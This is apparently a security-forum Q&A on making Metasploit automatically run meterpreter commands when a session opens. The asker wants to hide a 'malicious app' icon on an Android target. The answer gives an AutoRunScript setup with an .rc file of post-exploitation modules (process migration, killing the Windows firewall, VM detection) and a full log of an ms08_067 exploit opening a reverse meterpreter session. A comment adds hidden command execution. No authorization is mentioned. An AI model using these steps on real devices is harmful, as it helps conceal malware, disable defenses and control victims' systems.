4

Is there a way to run one or multiple meterpreter commands automatically, as soon as the listener gets a connection (i.e session is established with a target)? I want to run the 'hide_app_icon' command as soon as a session is gained. Any ideas?

PS: The target is an Android device and listener is running on a debian VPS.

wishchaser
  • 175
  • 1
  • 1
  • 8

1 Answers1

3

Yeah sure! you can define a file with commands (.rc file) and set that file as autoexecutable.

msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

Put inside .rc file the commands you want to launch:

run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm

Then, after a session is created they will be executed automatically:

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.200.40:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400

meterpreter > 
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*]     Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*]     Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*]     Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine

Extracted from here. I copied and pasted the same example because is enough to explain it. And check the link, it has more interesting stuff.

OscarAkaElvis
  • 5,185
  • 3
  • 17
  • 48
  • Ty, I did look at the resource before posting the question here. And that doesn't seem like the code to execute only 'app_hide_icon' after a session. Seems like it does some advanced stuff. Could you please narrow it down to perform only this simple 'app_hide_icon' function. – wishchaser Mar 03 '17 at 17:20
  • You can execute commands on remote device. An example for windows to launch this from the meterpreter shell: `meterpreter > execute -f cmd.exe -i -H` . So you can execute what you need on the android, or upload a file and then execute that file or whatever you need. I don't know how to hide an icon in android, what is your command? If you don't know it, maybe that is another different question. – OscarAkaElvis Mar 03 '17 at 17:27
  • From a meterpreter, the command 'hide_app_icon' hides the application icon of the malcious app from the app menu. I am just trying to automate it without typing in the command after the session. – wishchaser Mar 03 '17 at 17:30
  • So you have the answer. With my example you know how to automatize commands and you know the command to automatize. Put that command inside the .rc file. – OscarAkaElvis Mar 03 '17 at 17:32
  • is there a way I could execute *metasploit* (like jobs -K) commands after a sessions has been established? – AK_ Mar 08 '18 at 12:10